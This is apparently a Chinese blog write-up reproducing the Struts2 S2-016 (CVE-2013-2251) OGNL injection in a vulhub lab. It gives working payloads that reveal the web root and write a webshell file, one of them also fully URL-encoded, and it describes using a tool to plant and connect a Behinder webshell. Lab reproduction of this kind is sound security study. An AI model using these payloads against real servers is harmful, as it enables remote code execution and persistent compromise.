Loading

CVE-2013-2251 S2-016复现

0X00-引言

每年桃花开的时候,我就会想起一个人

s2-016有点意思,看懂源码后会补充

0X01-环境搭建

靶机:CentOS Linux 7

攻击机:windows server 2016 && Kail

环境:vulhub

项目地址:https://github.com/vulhub/vulhub

搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)

0X02-漏洞描述

在struts2中,DefaultActionMapper类以“action:”、“redirect:”、“redirectAction:”作为导航原生可以引导,但是这些自带的同时跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java动态方法执行任意系统命令。

所以,访问http://your-ip:8080/index.action?redirect:OGNL表达式浏览OGNL表达式。

0X03-漏洞复现

01-获取web目录

payload:

redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#ot=#resp.getWriter (),#ot.print('web'),#ot.print('path:'),#ot.print(#req.getSession().getServletContext().getRealPath('/')),#ot.flush(),#ot.close()}

url编码:

%72%65%64%69%72%65%63%74%3a%24%7b%23%72%65%71%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27%63%6f%27%2b%27%6d%2e%6f%70%65%6e%27%2b%27%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%27%2b%27%72%6b%32%2e%64%69%73%70%27%2b%27%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%27%2b%27%76%6c%65%74%52%65%71%27%2b%27%75%65%73%74%27%29%2c%23%72%65%73%70%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27%63%6f%27%2b%27%6d%2e%6f%70%65%6e%27%2b%27%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%27%2b%27%72%6b%32%2e%64%69%73%70%27%2b%27%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%27%2b%27%76%6c%65%74%52%65%73%27%2b%27%70%6f%6e%73%65%27%29%2c%23%72%65%73%70%2e%73%65%74%43%68%61%72%61%63%74%65%72%45%6e%63%6f%64%69%6e%67%28%27%55%54%46%2d%38%27%29%2c%23%6f%74%3d%23%72%65%73%70%2e%67%65%74%57%72%69%74%65%72%20%28%29%2c%23%6f%74%2e%70%72%69%6e%74%28%27%77%65%62%27%29%2c%23%6f%74%2e%70%72%69%6e%74%28%27%70%61%74%68%3a%27%29%2c%23%6f%74%2e%70%72%69%6e%74%28%23%72%65%71%2e%67%65%74%53%65%73%73%69%6f%6e%28%29%2e%67%65%74%53%65%72%76%6c%65%74%43%6f%6e%74%65%78%74%28%29%2e%67%65%74%52%65%61%6c%50%61%74%68%28%27%2f%27%29%29%2c%23%6f%74%2e%66%6c%75%73%68%28%29%2c%23%6f%74%2e%63%6c%6f%73%65%28%29%7d

image-20211203231037146

02-写入webshell

木马文件上传不上去,可以生成文件,但是文件里面没有内容,找不到原因,可能被杀掉了,但是靶场没有防护软件,听朋友说有域控防控,后面在研究

payload:

redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest"),#b=new java.io.FileOutputStream(new java.lang.StringBuilder(#a.getRealPath("/")).append(@java.io.File@separator).append("2.jspx").toString()),#b.write(#a.getParameter("t").getBytes()),#b.close(),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println("BINGO"),#genxor.flush(),#genxor.close()}

image-20211203232528216

0X04-漏洞分析

0X05-日志查看

docker ps #查看容器ID
docker exec -it ID /bin/bash #进入
cd logs #进入日志目录
cat localhost_access_log.2021-12-02.txt #查看日志
exit #退出容器

image-20211203232821955

0X06-工具检测

工具地址:https://github.com/Liqunkit/LiqunKit_

image-20211203233401250

上传冰蝎马,工具可以上传马,但是手动上传不上去马的内容,不知道原因

image-20211203233737231

路径

image-20211203233822675

冰蝎连接

image-20211203234246317

0X07-参考

S2-016 远程代码执行漏洞

Struts2 S2-016/S2-017 命令执行带回显、写入文件,看web路径、getshell exp整理

https://cloud.tencent.com/developer/article/1719018

posted @ 2021-12-03 23:51  美式加糖  阅读(875)  评论(6编辑  收藏  举报